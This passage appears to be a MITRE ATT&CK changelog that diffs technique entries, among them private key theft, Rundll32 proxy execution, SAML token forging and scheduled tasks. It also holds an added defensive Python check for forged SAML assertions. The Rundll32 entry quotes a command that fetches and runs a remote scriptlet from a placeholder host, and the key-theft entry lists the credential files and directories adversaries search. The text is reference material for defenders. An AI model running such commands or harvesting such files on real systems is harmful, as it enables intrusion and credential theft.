- Old: "When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token)"
- New: "When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token)"
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-12 23:52:08.194000+00:00 | 2024-10-04 11:31:56.622000+00:00 |
description | Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. | Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. |
external_references[4]['url'] | https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf | https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1498.002] Network Denial of Service: Reflection Amplification
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:41.052000+00:00 | 2024-10-15 16:04:34.495000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1114.002] Email Collection: Remote Email Collection
Current version: 1.3
Version changed from: 1.2 → 1.3
New Mitigations:
- M1060: Out-of-Band Communications Channel
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-05-31 12:34:03.420000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1556.005] Modify Authentication Process: Reversible Encryption
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-02-10 21:35:25.377000+00:00 | 2024-08-26 15:40:31.871000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1218.011] System Binary Proxy Execution: Rundll32
Current version: 2.3
Version changed from: 2.2 → 2.3
Description diff (old → new; only the passage that changed is shown here, the full old and new description values are listed under Details):
- Old: "Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript."
- New: "Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe. Rundll32 can also be used to execute scripts such as JavaScript."
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 15:35:28.965000+00:00 | 2024-10-14 13:14:43.083000+00:00 |
description | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction} ).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser . Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction , rundll32.exe would first attempt to execute ExampleFunctionW , or failing that ExampleFunctionA , before loading ExampleFunction ). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1 ).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction} ).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser . Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction , rundll32.exe would first attempt to execute ExampleFunctionW , or failing that ExampleFunctionA , before loading ExampleFunction ). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1 ).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
external_references[3]['url'] | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ | https://www.stormshield.com/news/poweliks-command-line-confusion/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.2 | 2.3 |
[T1565.003] Data Manipulation: Runtime Data Manipulation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 19:24:18.545000+00:00 | 2024-10-15 18:21:43.760000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1606.002] Forge Web Credentials: SAML Tokens
Current version: 1.4
Version changed from: 1.3 → 1.4
Description diff (old → new; only the sentence that changed is shown here, the full old and new description values are listed under Details):
- Old: "An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account."
- New: "An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account."
Details

values_changed

STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 17:55:56.116000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[4] | Google Workspace | Identity Provider |
x_mitre_platforms[3] | Office 365 | Office Suite |

description (Old value):

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

description (New value):

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

iterable_item_removed

STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
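The two properties of a forged token that the description above makes observable, a Conditions window far beyond the one-hour default lifetime and a signing certificate the organization's IdP never issued, checked on a constructed assertion. This is an added Python example, not code from the ATT&CK page; the assertion, certificate bytes, issuer URL and thumbprint allowlist are constructed, and XML-DSig signature verification is assumed to run before these checks.

```python
# Added example, not code from the ATT&CK page. The assertion, certificate bytes
# and issuer URL are constructed placeholders; cryptographic verification of the
# XML signature is assumed to be done by an XML-DSig library before these checks.
import base64, hashlib
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion", "ds": "http://www.w3.org/2000/09/xmldsig#"}

def _parse_ts(value):
    # SAML timestamps are UTC xs:dateTime values such as 2024-10-14T12:00:00Z
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def check_assertion(xml_text, trusted_thumbprints, now, max_lifetime=timedelta(hours=1)):
    """Return a list of findings; an empty list means the assertion passed.
    trusted_thumbprints: SHA-1 thumbprints (upper-case hex) of the IdP's known
    token-signing certs. A token signed with a stolen key reuses a known cert,
    which is why the lifetime check runs even when the thumbprint matches."""
    root = ET.fromstring(xml_text)
    findings = []
    cond = root.find("saml:Conditions", NS)
    if cond is None:
        return ["no Conditions element"]
    not_before = _parse_ts(cond.get("NotBefore"))
    not_on_or_after = _parse_ts(cond.get("NotOnOrAfter"))
    if not (not_before <= now < not_on_or_after):
        findings.append("outside validity window")
    lifetime = not_on_or_after - not_before
    if lifetime > max_lifetime:  # default SAML token lifetime is one hour
        findings.append(f"lifetime {lifetime} exceeds policy {max_lifetime}")
    cert = root.find(".//ds:X509Certificate", NS)
    if cert is None:
        findings.append("no signing certificate")
    else:
        thumbprint = hashlib.sha1(base64.b64decode(cert.text.strip())).hexdigest().upper()
        if thumbprint not in trusted_thumbprints:
            findings.append(f"unknown signing certificate {thumbprint}")
    return findings

def build_assertion(not_before, not_on_or_after, cert_b64):
    # Minimal constructed assertion; SignatureValue is omitted for brevity.
    return f"""<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_constructed" Version="2.0">
  <saml:Issuer>http://adfs.example.test/adfs/services/trust</saml:Issuer>
  <ds:Signature><ds:KeyInfo><ds:X509Data>
    <ds:X509Certificate>{cert_b64}</ds:X509Certificate>
  </ds:X509Data></ds:KeyInfo></ds:Signature>
  <saml:Subject><saml:NameID>admin@example.test</saml:NameID></saml:Subject>
  <saml:Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}"/>
</saml:Assertion>"""

def _ts(dt):
    return dt.strftime("%Y-%m-%dT%H:%M:%SZ")

# Constructed fixtures: the "certificates" are placeholder bytes, not real X.509.
NOW = datetime(2024, 10, 14, 12, 0, 0, tzinfo=timezone.utc)
KNOWN_CERT = b"constructed: the IdP's own token-signing certificate (DER)"
ROGUE_CERT = b"constructed: cert from an attacker-added AD FS federation trust"
TRUSTED_THUMBPRINTS = {hashlib.sha1(KNOWN_CERT).hexdigest().upper()}
GOOD_ASSERTION = build_assertion(_ts(NOW - timedelta(minutes=5)), _ts(NOW + timedelta(minutes=55)),
                                 base64.b64encode(KNOWN_CERT).decode())
FORGED_ASSERTION = build_assertion(_ts(NOW - timedelta(days=1)), _ts(NOW + timedelta(days=365)),
                                   base64.b64encode(ROGUE_CERT).decode())
```

A forged token signed with the IdP's stolen key passes the thumbprint check, so the lifetime finding is the one worth alerting on in that case.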
[T1608.006] Stage Capabilities: SEO Poisoning
Current version: 1.1
Version changed from: 1.0 → 1.1
Details

values_changed

STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13 20:35:52.302000+00:00 | 2024-08-14 15:03:56.383000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_contributors[0] | Goldstein Menachem | Menachem Goldstein |

description (Old value):

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)

To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)

description (New value):

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)

To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)

In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)

iterable_item_added

STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Chexmarx-seo', 'description': 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming the Star Ranking Game. Retrieved June 18, 2024.', 'url': 'https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7'} |
external_references | | {'source_name': 'Checkmarx-oss-seo', 'description': 'Yehuda Gelb. (2024, April 10). New Technique to Trick Developers Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.', 'url': 'https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/'} |
[T1505.001] Server Software Component: SQL Stored Procedures
Current version: 1.1
Version changed from: 1.0 → 1.1
Details

dictionary_item_added

STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |

dictionary_item_removed

STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | |

values_changed

STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-25 23:30:20.638000+00:00 | 2024-10-15 16:05:24.007000+00:00 |
external_references[1]['description'] | Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019. | Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12, 2024. |
external_references[1]['url'] | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ | https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ |
external_references[5]['description'] | Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019. | Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved September 12, 2024. |
external_references[5]['url'] | https://blog.netspi.com/attacking-sql-server-clr-assemblies/ | https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/ |
x_mitre_version | 1.0 | 1.1 |
[T1595.001] Active Scanning: Scanning IP Blocks
Current version: 1.1
Version changed from: 1.0 → 1.1
New Detections:
- DS0029: Network Traffic (Network Traffic Content)
Details

dictionary_item_added

STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Diego Sappa, Securonix'] |
x_mitre_deprecated | | False |

values_changed

STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:19:38.469000+00:00 | 2024-10-15 13:46:55.039000+00:00 |
x_mitre_version | 1.0 | 1.1 |

iterable_item_added

STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Network Traffic: Network Traffic Content |
[T1053.005] Scheduled Task/Job: Scheduled Task
Current version: 1.6
Version changed from: 1.5 → 1.6
Old description:

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not b

New description:

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create